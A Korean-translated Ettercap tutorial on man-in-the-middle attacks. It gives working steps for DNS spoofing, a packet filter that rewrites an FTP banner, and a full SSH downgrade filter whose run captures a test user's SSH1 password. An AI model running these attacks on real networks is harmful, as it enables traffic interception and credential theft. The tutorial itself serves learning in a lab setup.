ETTERCAP - The Easy Tutorial - Man in the middle attacks

Ettercap Mitm attacks
์ตœ์ข… ์—…๋ฐ์ดํŠธ: Jul 21 2011



Korean translation by Youngbin Benjamin Im helped by powerhan96.



โš ๏ธโš ๏ธโš ๏ธ
Please check our page about COVID-19!!
100 Questions and answers about Coronavirus.

โš ๏ธโš ๏ธโš ๏ธ
Merci de consulter notre page sur la COVID-19 !!
227 questions et rรฉponses sur le Coronavirus.


ARP๊ฐ์—ผ ์„ค๋ช…์„œ์„ ๋ดค๋‹ค๋ฉด ๋Œ€์ƒ์ž์˜ ARP์บ์‰ฌ๊ฐ€ ๊ฐ•์ œ์ ์œผ๋กœ ๋ณ€๊ฒฝ๋˜์–ด Ettercap PC๋ฅผ ํ†ต๊ณผํ•˜์—ฌ ์›ํ•˜๋Š” ๋ชฉ์ ์ง€๋กœ ํŒจํ‚ท์„ ๋ณด๋‚ด๋„๋ก ์„ค์ •์ด ๋˜์–ด์žˆ์„ ๊ฒƒ์ด๋‹ค.

๋„คํŠธ์›Œํฌ ์‹œ๋‚˜๋ฆฌ์˜ค ๋‹ค์ด์–ด๊ทธ๋žจ์€ Ettercap ์†Œ๊ฐœ ํŽ˜์ด์ง€์— ๋‚˜์™€์žˆ๋‹ค.

์ด๋Ÿฌํ•œ ํŠธ๋žฉ์ด ์„ค์ •์ด ๋˜์—ˆ๋‹ค๋ฉด ์ด๊ฒŒ ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•œ ์ƒํ™ฉ์ด ๋œ ๊ฒƒ์ด๊ณ  ๋‘ PC๊ฐ„์˜ ์˜ค๊ณ  ๊ฐ€๋Š” ํŒจํ‚ท์„ ์ˆ˜์ •ํ•˜๊ณ  ํ•„ํ„ฐ๋ง ํ•  ์ˆ˜ ์žˆ๋Š” ์ƒํƒœ๋‹ค.

ํ”ผํ•ด์žPC๋ฅผ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” Ettercap์˜ ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ์‚ฌ์šฉํ•ด๋„ ๋˜๊ณ  ์ง์ ‘ ํ•„ํ„ฐ๋ฅผ ์ž‘์„ฑํ•˜์—ฌ ์‚ฌ์šฉํ•ด๋„ ๋œ๋‹ค.


1. ํ”Œ๋Ÿฌ๊ทธ์ธ 2. ํ•„ํ„ฐ


ํ”Œ๋Ÿฌ๊ทธ์ธ

์—ฌ๊ธฐ์„œ๋Š” dns_spoof๋ผ๋Š” Ettercap ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ์‚ฌ์šฉํ•˜์—ฌ ๋งค์šฐ ์œ ๋ช…ํ•œ DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ํ•  ๊ฒƒ์ด๋‹ค. DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์€ ๊ณต๊ฒฉ์ž๊ฐ€ DNS ์š”์ฒญ์„ ๋ฐ›์•„ DNS ์„œ๋ฒ„์ฒ˜๋Ÿผ ์‘๋‹ตํ•˜๋Š” ๊ฒƒ์ด๋‹ค.
ํ‰์†Œ์— ์ž์ฃผ ๋ฐฉ๋ฌธํ•˜๋Š” ์›นํŽ˜์ด์ง€๋ฅผ ๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด ์ ‘๊ทผํ•  ๋•Œ, ์ž์‹ ์˜ PC (์ด์ „ ์„ค๋ช…์„œ์˜ ์˜ˆ์ œ์—์„œ IP์ฃผ์†Œ๋ฅผ 192.168.1.2๋กœ ์‚ฌ์šฉํ•˜์˜€๋‹ค)๋Š” ๊ฐ€์žฅ ๋จผ์ € URL์„ DNS ์„œ๋ฒ„๋กœ ๋ณด๋‚ด ์ด์— ํ•ด๋‹นํ•˜๋Š” IP์ฃผ์†Œ๋ฅผ ์š”์ฒญํ•  ๊ฒƒ์ด๊ณ  ์ด IP์ฃผ์†Œ๋ฅผ ๊ฐ€์ง€๊ณ  ๋ธŒ๋ผ์šฐ์ €๋Š” ํ•ด๋‹น ์›นํŽ˜์ด์ง€์˜ ์ •๋ณด๋ฅผ ๋ถˆ๋Ÿฌ์™€ ๋ณด์—ฌ์ค„ ๊ฒƒ์ด๋‹ค.
DNS ์Šคํ‘ธํ•‘์„ ํ•˜๋ฉด, DNS๋กœ์˜ ์š”์ฒญ์„ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ฐ€๋กœ์ฑ„ ์ •์ƒ์ ์ธ DNS ์„œ๋ฒ„ ๋Œ€์‹  ์—‰๋šฑํ•œ IP์ฃผ์†Œ๋กœ ์‘๋‹ตํ•  ์ˆ˜ ์žˆ๋‹ค.
์œ„์™€ ๊ฐ™์€ ๊ณต๊ฒฉ์˜ ๊ฒฐ๊ณผ๋Š”, ํ”ผํ•ด์ž๊ฐ€ ์›ํ•˜๋Š” ์›นํŽ˜์ด์ง€๋ฅผ ์ ‘๊ทผํ•˜์˜€๋‹ค๊ณ  ์ƒ๊ฐํ•˜์ง€๋งŒ ์‹ค์ œ๋กœ๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ๊ณตํ•œ IP์ฃผ์†Œ์˜ ์›นํŽ˜์ด์ง€๋ฅผ ๋ณด๊ฒŒ ๋œ๋‹ค.
๊ณต๊ฒฉ์ž๊ฐ€ ์€ํ–‰๊ณผ ๊ฐ™์€ ์›นํŽ˜์ด์ง€๋ฅผ ์Šคํ‘ธํ•‘ํ•œ๋‹ค๋ฉด ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์€ ์•„์ฃผ ์œ„ํ—˜ํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ๊ฐ€์งœ ์›นํŽ˜์ด์ง€๋ฅผ ์‹ค์ œ ์‚ฌ์ดํŠธ์™€ ๋™์ผํ•œ ๋ชจ์Šต์œผ๋กœ ๋งŒ๋“ค์–ด ๋‘๊ณ  ํ”ผํ•ด์ž๊ฐ€ ์ ‘๊ทผํ•˜๊ธฐ๋ฅผ ๊ธฐ๋‹ค๋ ธ๋‹ค๊ฐ€ ๊ฐœ์ธ์ •๋ณด๋ฅผ ์ทจ๋“ํ•  ์ˆ˜ ์žˆ๋‹ค.
์ด์ œ DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•ด๋ณด์ž.
์ฒซ ๋ฒˆ์งธ๋กœ ํ•ด์•ผ ํ•  ๊ฒƒ์€ /usr/share/ettercap/ ๋””๋ ‰ํ† ๋ฆฌ์— ์žˆ๋Š” etter.dnsํŒŒ์ผ์„ ์„ค์ •ํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

#vim /usr/share/ettercap/etter.dns
ํŒŒ์ผ์„ ์—ด๋ฉด ์„ค์ •์— ๋Œ€ํ•œ ๋‚ด์šฉ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.
์•„๋ž˜๋Š” etter.dns์˜ ๋‚ด์šฉ์ด๋‹ค.

linux1.org      A    198.182.196.56
*.linux.com     A    198.182.196.56
www.linux.org   PTR  198.182.196.56
์œ„ ์„ค์ • ์ •๋ณด์— ๋”ฐ๋ฅด๋ฉด ํ”ผํ•ด์ž๊ฐ€ ์›น๋ธŒ๋ผ์šฐ์ €๋ฅผ ํ†ตํ•ด www.linux1.org์— ์ ‘์†ํ•˜๋ฉด ์‹ค์ œ๋กœ๋Š” www.linux.org ์‚ฌ์ดํŠธ๊ฐ€ ์—ด๋ฆฌ๋„๋ก ํ•˜๋ผ๋Š” ๊ฒƒ์ด๋‹ค.

DNS ์Šคํ‘ธํ•‘์„ ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” Ettercap ๊ทธ๋ž˜ํ”ฝ ์ธํ„ฐํŽ˜์ด์Šค์—์„œ dns_spoof ํ”Œ๋Ÿฌ๊ทธ์ธ์„ ํ™œ์„ฑํ™” ์‹œ์ผœ์•ผ ํ•œ๋‹ค. DNS ์Šคํ‘ธํ•‘ ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” ARP ๊ฐ์—ผ ์„ค๋ช…์„œ์„ ๋จผ์ € ์ˆ˜ํ–‰ํ•˜๋„๋ก ํ•œ๋‹ค.

Plugins -> Manage the plugins

Select the dns_spoof line to activate the plugin. Activation is confirmed by the asterisk on the left of the line.


์›น ๋ธŒ๋ผ์šฐ์ €์— www.linux1.org๋ฅผ ์ž…๋ ฅํ•œ๋‹ค.
์›น ํŽ˜์ด์ง€๋ฅผ ์—ด์–ด๋ณด๋ฉด ์‹ค์ œ ํŽ˜์ด์ง€๊ฐ€ ์•„๋‹Œ etter.dnsํŒŒ์ผ์— ์ถ”๊ฐ€ํ•œ www.linux1.org์ฃผ์†Œ์— ํ•ด๋‹นํ•˜๋Š” IP์ฃผ์†Œ์˜ ํŽ˜์ด์ง€์ธ ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.


DNS ์Šคํ‘ธํ•‘ ๋ฉˆ์ถ”๊ธฐ

Start -> Stop sniffing
๊ณต๊ฒฉ์„ ์ค‘๋‹จํ–ˆ์Œ์—๋„ ๋ถˆ๊ตฌํ•˜๊ณ  www.linux1.org์„ ์—ด์–ด๋ณด๋ฉด ๋ณ€๊ฒฝ๋œ www.linux.org์˜ ๋‚ด์šฉ์„ ๋ณด๊ฒŒ ๋œ๋‹ค. ์ด๊ฒƒ์€ ํด๋ผ์ด์–ธํŠธ์˜ PC์˜ DNS ์บ์‹œ์ •๋ณด๊ฐ€ ๋‚จ์•„์žˆ๊ธฐ ๋•Œ๋ฌธ์ธ๋ฐ, ์œˆ๋„์šฐ์˜ ๊ฒฝ์šฐ DNS ์บ์‹œ์˜ ๋‚ด์šฉ์„ 300์ดˆ(5๋ถ„)๊ฐ„ ์œ ์ง€ํ•˜๋„๋ก ์„ค์ •๋˜์–ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค. ์›๋ž˜๋Œ€๋กœ ๋ณต๊ตฌ๋ฅผ ํ•˜๋ ค๋ฉด 5๋ถ„์„ ๊ธฐ๋‹ค๋ฆฌ๊ฑฐ๋‚˜ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ DNS ์บ์‰ฌ๋ฅผ ์ดˆ๊ธฐํ™” ํ•  ์ˆ˜ ์žˆ๋‹ค.

์œˆ๋„์šฐ์—์„œ ์ปด๋งจ๋“œ๋ผ์ธ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์‹คํ–‰ํ•œ๋‹ค.
Start -> Run -> cmd

C:\Documents and Settings\administrator>ipconfig /flushdns
์šฐ๋ถ„ํˆฌ์—์„œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๋œ๋‹ค: โ€œ/etc/init.d/dns-clean startโ€
DNS ์บ์‹œ๋ฅผ ํ™•์ธํ•˜๋ ค๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค.

C:\Documents and Settings\administrator>ipconfig /displaydns
๋งŒ์•ฝ DNS ์บ์‹œ์˜ ๋””ํดํŠธ ์ €์žฅ์‹œ๊ฐ„์„ ๋ณ€๊ฒฝํ•˜๋ ค๋ฉด ์œˆ๋„์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์˜ ๊ฐ’์„ ๋ณ€๊ฒฝํ•ด์•ผ ํ•œ๋‹ค.
๋ ˆ์ง€์ŠคํŠธ๋ฆฌ๋ฅผ ๋ณ€๊ฒฝํ•  ๊ฒฝ์šฐ์—๋Š” ๋งค์šฐ ์กฐ์‹ฌํ•ด์•ผ ํ•œ๋‹ค. ์ž˜๋ชป๋œ ์„ค์ •์€ ์‹œ์Šคํ…œ์— ํฐ ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ์œผ๋ฉฐ ๋ถ€ํŒ…์ด ์•ˆ ๋˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์ƒ๊ธธ ์ˆ˜๋„ ์žˆ๋‹ค.

Start -> Run -> regedit, then browse to the tree below:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\

์˜ค๋ฅธ์ชฝ ํŒจ๋„์˜ โ€œNegativeCacheTimeโ€์„ ํด๋ฆญํ•œ๋‹ค.


โ€œDecimalโ€ ๋ฒ„ํŠผ์„ ํด๋ฆญํ•˜๊ณ  DNS ์บ์‹œ ์ €์žฅ์‹œ๊ฐ„์˜ ๊ฐ’์„ ๋ณ€๊ฒฝํ•œ๋‹ค.





ํ•„ํ„ฐ

ํ•„ํ„ฐ๋Š” ํŒจํ‚ท์˜ ๋‚ด์šฉ์„ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ธฐ๋Šฅ์ด๋‹ค.
ํ•„ํ„ฐ๋ฅผ ์„ค์ •ํ•˜๊ณ  ์ ์šฉํ•˜๋ ค๋ฉด ์„ค์ •ํŒŒ์ผ์„ ์ปดํŒŒ์ผ ํ•ด์•ผ ํ•œ๋‹ค. ์ด๋ฏธ ์ •์˜๋œ ์˜ˆ์ œ๋Š” /usr/share/ettercap ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.
๋‘ ๊ฐ€์ง€ ์˜ˆ๋ฅผ ํ†ตํ•ด Ettercap ํ•„ํ„ฐ๋ฅผ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค.

1. Changing the FTP prompt
2. SSH downgrade attack

1. Changing the FTP prompt:

FTP ์—ฐ๊ฒฐ์—์„œ ํ”„๋กฌํ”„ํŠธ๋ฅผ ๋ณ€๊ฒฝํ•˜๋Š” ์˜ˆ์ œ๋ฅผ ๋ณด๋„๋ก ํ•˜๊ฒ ๋‹ค. ์•„๋ž˜๋Š” /usr/share/ettercap ๋””๋ ‰ํ† ๋ฆฌ์— ์žˆ๋Š” test_filter๋ผ๋Š” ์„ค์ •ํŒŒ์ผ์ด๋‹ค.

# replace the FTP prompt
# matches packets sent by the FTP server (source port 21) whose payload contains the ProFTPD banner
if (tcp.src == 21 && search(DATA.data, "ProFTPD")) {
   replace("ProFTPD", "TeddyBear FTPD");
}


Ettercap์€ ์ปดํŒŒ์ผ ๋œ ์„ค์ •ํŒŒ์ผ๋งŒ ๋กœ๋“œํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ etterfilter๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ปดํŒŒ์ผ์„ ํ•ด์•ผ ํ•œ๋‹ค.

#etterfilter etter_filter -o etter_filter_compil
A compiled filter file named etter_filter_compil is created.

Ettercap์—์„œ ๋ถˆ๋Ÿฌ์˜จ๋‹ค.

Filters -> Load a filter...

์ด์ œ, ํด๋ผ์ด์–ธํŠธ PC(192.168.1.2)๋ฅผ ์ด์šฉํ•˜์—ฌ FTP์—ฐ๊ฒฐ์„ ์‹œํ—˜ํ•ด๋ณด๋„๋ก ํ•œ๋‹ค. ์‹œํ—˜ ๋ฐฉ๋ฒ•์€ Ettercap ํ•„ํ„ฐ๋ฅผ ์ ์šฉํ•˜๊ธฐ ์ด์ „๊ณผ ์ดํ›„๋ฅผ ๋น„๊ตํ•˜๋Š” ๋ฐฉ์‹์œผ๋กœ ํ•œ๋‹ค.
โ€œxyzโ€๋Š” ์›น์‚ฌ์ดํŠธ ๋ช…์ด๋ฉฐ IP์ฃผ์†Œ๋Š” โ€œ1.2.3.4โ€์ด๋‹ค.

(๋‹น์—ฐํ•œ ์–˜๊ธฐ์ง€๋งŒ, ๊ณต๊ฒฉ์ž PC๋Š” ์ค‘๊ฐ„์ž ์ƒํƒœ๋กœ ๋งŒ๋“ค์–ด ๋‘์–ด์•ผ ํ•œ๋‹ค. ์ค‘๊ฐ„์ž ์ƒํƒœ๊ฐ€ ์•„๋‹ˆ๋ผ๋ฉด [ARP ๊ฐ์—ผ ์„ค๋ช…์„œ]๋ฅผ ๋จผ์ € ์ˆ˜ํ–‰ํ•œ ํ›„ ์ง„ํ–‰ํ•˜๊ธฐ ๋ฐ”๋ž€๋‹ค.)

Before applying the filter:

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "ProFTPD 1.3.0a Server ("ProFTPD) [1.2.3.4]
User (xyz.com:(none)):

After applying the filter:

C:\Documents and Settings\Administrator>ftp www.xyz.com
Connected to xyz.com.
220 "TeddyBear FTPD 1.3.0a Server ("TeddyBear FTPD) [1.2.3.4]
User (xyz.com:(none)):




2. SSH downgrade attack

โ€œthe downgrade ๊ณต๊ฒฉโ€์œผ๋กœ ๋ถˆ๋ฆฌ๋Š” ํŠน๋ณ„ํ•œ ๊ณต๊ฒฉ ์—ญ์‹œ ์ค‘๊ฐ„๊ฐ€ ํฌ์ด์ฆˆ๋‹์ด ์™„๋ฃŒ๋˜๋ฉด ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค. ์ด ๊ณต๊ฒฉ์˜ ์›๋ฆฌ๋Š” ํŒจํ‚ท ๋‚ด์šฉ์˜ ์ •๋ณด๋ฅผ ๋ณ€๊ฒฝํ•˜์—ฌ ์‚ฌ์šฉํ•˜๋Š” ํ”„๋กœํ† ์ฝœ ๋ฒ„์ „์„ ์ทจ์•ฝํ•œ ๋ฒ„์ „์œผ๋กœ ๋‚ฎ์ถ”๋Š” ๋ฐฉ์‹์ด๋‹ค.

---------------- ์›๋ฆฌ ----------------

SSH๋Š” Downgrade ๊ณต๊ฒฉ์˜ ์˜ˆ๋กœ ๊ฐ€์žฅ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ํ”„๋กœํ† ์ฝœ ์ค‘ ํ•˜๋‚˜๋กœ, ๊ณต๊ฒฉ ๋Œ€์ƒ PC์™€ ์„œ๋ฒ„๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” SSH๋ฅผ ๋ณด์•ˆ์ด ์ทจ์•ฝํ•œ SSH1 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ•˜๋„๋ก ๊ณต๊ฒฉ์ž๊ฐ€ ๊ฐ•์ œํ•˜๋Š” ๋ฐฉ๋ฒ•์ด๋‹ค.

ํด๋ผ์ด์–ธํŠธ๋Š” SSH ๋งํฌ๋ฅผ ์„ฑ๋ฆฝํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋ฒ„์— ์ง€์› ๊ฐ€๋Šฅํ•œ ํ”„๋กœํ† ์ฝœ ๋ฒ„์ „ ์ •๋ณด๋ฅผ ์š”์ฒญํ•œ๋‹ค.
์„œ๋ฒ„๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์‘๋‹ต์„ ๋ณด๋‚ด๊ฒŒ ๋œ๋‹ค:
- ssh-2.xx The server supports only SSH2
- ssh-1.99 The server supports SSH1 and SSH2
- ssh-1.51 The server supports only SSH1

์—ฌ๊ธฐ์„œ ๋ณด์—ฌ์ค„ ์˜ˆ์ œ์—์„œ๋Š” ์„œ๋ฒ„์™€ ํด๋ผ์ด์–ธํŠธ ๋ชจ๋‘ SSH1๊ณผ SSH2 ๋‘˜ ๋‹ค ์ง€์›ํ•˜๋„๋ก ์„ค์ •์„ ํ•˜์˜€์œผ๋ฉฐ SSH2๋ฅผ ์ƒ์œ„ ์„ค์ •์œผ๋กœ ์ง€์ •ํ•ด ๋†“์•˜๋‹ค.

๋งŒ์•ฝ, ์„œ๋ฒ„์—์„œ SSHv1๊ณผ SSHv2๋ฅผ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋„๋ก ์„ค์ •ํ•˜์˜€์œผ๋ฉด ํ•ด์ปค๋Š” โ€œ1.99โ€ ๋ฌธ์ž์—ด์„ โ€œ1.51โ€๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ํด๋ผ์ด์–ธํŠธ๋กœ ๋ณด๋‚ด๊ฒŒ ๋˜๋ฉฐ ํด๋ผ์ด์–ธํŠธ๋Š” ์„œ๋ฒ„๊ฐ€ SSH1๋งŒ ์ง€์›ํ•˜๋Š” ๊ฒƒ์œผ๋กœ ์ฐฉ๊ฐํ•˜๊ฒŒ ๋œ๋‹ค. ๊ฒฐ๊ตญ ํด๋ผ์ด์–ธํŠธ๋Š” SSH1 ๋งํฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ฒŒ ๋œ๊ณ  ์•ˆ์ „ํ•œ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉํ† ๋ก ์„ค์ •ํ•ด ๋†“์€ ํด๋ผ์ด์–ธํŠธ ์—ญ์‹œ SSH1 ๋งํฌ๋ฅผ ์—ด๊ฒŒ ๋œ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ ํ•ด์ปค๋Š” SSH1์˜ ์ทจ์•ฝํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์ธ์ฆ ์ ˆ์ฐจ๋ฅผ ์ด์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฐ”๋กœ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค..


---------------- ์˜ˆ์ œ๋ฅผ ์œ„ํ•œ ์ค€๋น„์‚ฌํ•ญ ----------------

a. SSH server: install OpenSSH on Linux.
b. SSH client: download Putty on Windows.
c. Hacker machine: Ettercap.

a. Server installation:

#apt-get install openssh-server

OpenSSH์„œ๋ฒ„์—์„œ ๋””ํดํŠธ๋กœ SSH2 ํ”„๋กœํ† ์ฝœ๋งŒ ์‚ฌ์šฉํ•˜๋„๋ก ์„ค์ •๋˜์–ด ์žˆ๋‹ค. SSH1 ํ”„๋กœํ† ์ฝœ ์‚ฌ์šฉ์„ ํ™œ์„ฑํ™” ํ•˜๋ ค๋ฉด /etc/ssh/sshd_configํŒŒ์ผ์—์„œ โ€œProtocolโ€๋กœ ์‹œ์ž‘๋˜๋Š” ๋ผ์ธ์„ ์ˆ˜์ •ํ•ด์•ผ ํ•œ๋‹ค.

#vim /etc/ssh/sshd_config
Protocol 1,2
์œ„์™€ ๊ฐ™์ด ์„ค์ •ํŒŒ์ผ ์ˆ˜์ •์ด ๋๋‚ฌ์œผ๋ฉด SSH1 ํ‚ค๊ฐ’์„ ์ƒ์„ฑํ•ด์•ผ ํ•œ๋‹ค. ๋งŒ์•ฝ ํ‚ค๊ฐ’์„ ์ƒ์„ฑํ•˜์ง€ ์•Š์œผ๋ฉด SSH ์„œ๋ฒ„๋ฅผ ์žฌ์‹œ์ž‘ ํ•˜์˜€์„ ๋•Œ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์˜ค๋ฅ˜๋ฅผ ๋ณผ ๊ฒƒ์ด๋‹ค. Disabling protocol version 1. Could not load host key.

#ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ""
Key ํŒจ์Šค๋ฅผ sshd_configํŒŒ์ผ์— ์ €์žฅํ•œ๋‹ค.

HostKey /etc/ssh/ssh_host_key
๋งˆ์ง€๋ง‰์œผ๋กœ ์„œ๋ฒ„๋ฅผ ์žฌ์‹œ์ž‘ ํ•œ๋‹ค.

#/etc/init.d/ssh restart
   * Restarting OpenBSD Secure Shell server sshd

SSH ์„œ๋ฒ„๋Š” ์ด์ œ SSH1๊ณผ SSH2 ํ”„๋กœํ† ์ฝœ์„ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋„๋ก ์„ค์ •์ด ๋˜์—ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  โ€œssh-1.99โ€๋กœ ์‘๋‹ตํ•˜๋„๋ก ์„ค์ •์ด ๋˜์—ˆ๋‹ค. ์ด๊ฒƒ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ช…๋ น์–ด๋กœ ํ™•์ธ์„ ํ•  ์ˆ˜ ์žˆ๋‹ค.

#telnet server_ip_address 22
Trying server_ip_address...
Connected to server_ip_address.
Escape character is '^]'.
SSH-1.99-OpenSSH_4.6p1 Debian-5ubuntu0.1


b. Client installation:

Putty ํด๋ผ์ด์–ธํŠธ๋ฅผ ๋‹ค์šด๋กœ๋“œํ•œ๋‹ค. Putty๋Š” ์˜คํ”ˆ ์†Œ์Šค์ด๋ฉฐ ์œˆ๋„์šฐ์šฉ SSHํด๋ผ์ด์–ธํŠธ๋กœ ์œ ๋ช…ํ•˜๋‹ค.
SSH์˜ ๋””ํดํŠธ ์„ค์ •์„ ์œ ์ง€ํ•œ๋‹ค. SSH1๊ณผ SSH2 ๋ชจ๋‘ ์ˆ˜์šฉ ๊ฐ€๋Šฅ ํ•˜์ง€๋งŒ SSH2๋ฅผ ์šฐ์„ ์ ์œผ๋กœ ์‚ฌ์šฉํ•œ๋‹ค.


c. Ettercap installation:

Install Ettercap using the Ettercap installation tutorial, and put the attacker PC in the man-in-the-middle position using the ARP poisoning tutorial.

์ด์ œ ํ™˜๊ฒฝ์˜ ์„ค์ •์€ ์™„๋ฃŒํ•˜์˜€์œผ๋ฉฐ SSH downgrade๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค.

---------------- Performing the SSH downgrade attack ----------------

Ettercap์€ SSH downgrade ๊ณต๊ฒฉ์— ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •ํŒŒ์ผ์„ ์ œ๊ณตํ•œ๋‹ค. ํŒŒ์ผ์€ /usr/share/ettercap/etter_filter_ssh์ด๋‹ค.
ํŒŒ์ผ์˜ ๋‚ด์šฉ์€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์œผ๋‚˜ ์ˆ˜์ •ํ•  ํ•„์š”๋Š” ์—†๋‹ค.

#cat /usr/share/ettercap/etter.filter.ssh
if (ip.proto == TCP) {
   if (tcp.src == 22) {
      if ( replace("SSH-1.99", "SSH-1.51") ) {
         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");
      } else {
         if ( search(DATA.data, "SSH-2.00") ) {
            msg("[SSH Filter] Server supports only SSH version 2\n");
         } else {
            if ( search(DATA.data, "SSH-1.51") ) {
               msg("[SSH Filter] Server already supports only version 1\n");
            }
         }
      }
   }
}
์œ„์˜ ํŒŒ์ผ์„ ์ปดํŒŒ์ผ๋งŒ ํ•˜๋ฉด ๋œ๋‹ค.

#etterfilter etter_filter_ssh -o etter_filter_ssh_co
์ด์ œ ํ•„ํ„ฐ๋ฅผ ๋กœ๋“œํ•˜๋ฉด ๋œ๋‹ค.

Filters -> Load a filter...

์ปดํŒŒ์ผ๋œ ํ•„ํ„ฐ๋ฅผ ์„ ํƒํ•œ๋‹ค.


ํ•„ํ„ฐ๊ฐ€ ๋กœ๋“œ ๋˜์—ˆ์œผ๋ฏ€๋กœ ํด๋ผ์ด์–ธํŠธ์—์„œ SSH๋งํฌ๋ฅผ ์—ด ์ค€๋น„๊ฐ€ ๋˜์—ˆ๋‹ค.


ํด๋ผ์ด์–ธํŠธ, ์„œ๋ฒ„, ๊ทธ๋ฆฌ๊ณ  ํ•ด์ปคPC์˜ ์„ค์ •์ด ์ œ๋Œ€๋กœ ๋˜์—ˆ๋‹ค.
์ด์ œ ํด๋ผ์ด์–ธํŠธ์—์„œ Putty๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ SSH๋งํฌ๋ฅผ ์—ด์–ด๋ณด๋„๋ก ํ•˜์ž.
Putty๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ์™ผ์ชฝ ๋ฉ”๋‰ด์—์„œ Session์„ ์„ ํƒํ•œ๋‹ค. SSH์„œ๋ฒ„์˜ IP์ฃผ์†Œ(์˜ˆ์ œ์—์„œ๋Š” 192.168.1.68์„ ์‚ฌ์šฉํ•˜๋„๋ก ํ•˜์˜€๋‹ค)๋ฅผ ์ž…๋ ฅํ•˜๊ณ  ์—ฐ๊ฒฐ ํƒ€์ž…์„ SSH๋กœ ๋ณ€๊ฒฝํ•œ๋‹ค. โ€œOpenโ€๋ฒ„ํŠผ์„ ํด๋ฆญํ•˜์—ฌ SSH ์„œ๋ฒ„๋กœ ์ ‘์†ํ•œ๋‹ค.


์ด์ œ ๋ชจ๋“  ์ƒํ™ฉ์ด ์„ค์ •๋Œ€๋กœ ๋˜๋Š”์ง€ ํ™•์ธํ•œ๋‹ค. ํ•ด์ปคPC์—์„œ SSH1 ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฐ›๋Š”์ง€ ํ™•์ธํ•œ๋‹ค.


์œ„์™€ ๊ฐ™์ด ๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•˜์˜€๋‹ค.

Ettercap์—์„œ SSH ๋ฒ„์ „์„ ๋‚ฎ์ถ”์—ˆ์œผ๋ฉฐ ๊ฐœ์ธ์ •๋ณด๋ฅผ ์ถ”์ถœํ•˜์˜€๋‹ค.
1. Downgraded the SSH version:
2. Captured the SSH1 credentials:
[SSH Filter] SSH downgraded from version 2 to 1
SSH : 192.168.1.68:22 -> USER:guillfab PASS:T0rduT1m
